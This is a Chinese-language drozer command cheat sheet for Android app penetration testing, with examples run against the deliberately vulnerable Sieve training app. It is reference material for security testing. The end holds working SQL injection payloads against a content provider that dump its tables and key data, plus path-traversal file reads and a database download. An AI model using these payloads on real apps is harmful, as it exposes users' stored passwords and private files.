开始一个会话

adb forward tcp:31415 tcp:31415
drozer console connect

检索包信息

run app.package.list -f <app name>
run app.package.info -a <package name>
run app.package.attacksurface    Get attack surface of package
run app.package.backup           Lists packages that use the backup API (returns true on FLAG_ALLOW_BACKUP)
run app.package.debuggable       Find debuggable packages
run app.package.info             Get information about installed packages
run app.package.launchintent     Get launch intent of package
run app.package.list             List Packages
run app.package.manifest         Get AndroidManifest.xml of package
run app.package.native           Find Native libraries embedded in the application.
run app.package.shareduid        Look for packages with shared UIDs

识别攻击面

run app.package.attacksurface <package name>

利用activity

run app.activity.info -a <package name> -u
run app.activity.start --component <package name> <component name>

利用内容提供商

run app.provider.info -a <package name>
run scanner.provider.finduris -a <package name>
run app.provider.query <uri>
run app.provider.update <uri> --selection <conditions> <selection arg> <column> <data>
run scanner.provider.sqltables -a <package name>
run scanner.provider.injection -a <package name>
run scanner.provider.traversal -a <package name>
run app.provider.finduri         Find referenced content URIs in a package
run app.provider.info            Get information about exported content providers
run app.provider.insert          Insert into a Content Provider
run app.provider.query           Query a content provider
run app.provider.read            Read from a content provider that supports files
run app.provider.update          Update a record in a content provider

利用广播接收器

run app.broadcast.info -a <package name>
run app.broadcast.send --component <package name> <component name> --extra <type> <key> <value>
run app.broadcast.sniff --action <action>

利用服务

run app.service.info -a <package name>
run app.service.start --action <action> --component <package name> <component name>
run app.service.send <package name> <component name> --msg <what> <arg1> <arg2> --extra <type> <key> <value> --bundle-as-obj

获取所有可访问的Uri

命令 run scanner.provider.finduris -a <package name>
示例 run scanner.provider.finduris -a com.example.studayappp.sieve

SQL注入

命令 run app.provider.query <uri> [--projection] [--selection]
示例 run app.provider.query content://com.example.studayappp.sieve.DBContentProvider/Passwords/
列出所有表 run app.provider.query content://com.example.studayappp.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type=‘table‘;--"
获取单表（如Key）的数据 run app.provider.query content://com.example.studayappp.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

检测SQL注入

命令 run scanner.provider.injection -a <package name>
示例 run scanner.provider.injection -a com.example.studayappp.sieve

检测目录遍历

命令 run scanner.provider.traversal -a <package name>
示例 run scanner.provider.traversal -a com.example.studayappp.sieve

读取文件系统下的文件

示例 run app.provider.read content://com.example.studayappp.sieve.FileBackupProvider/etc/hosts

下载数据库文件到本地

示例 run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db d:/database.db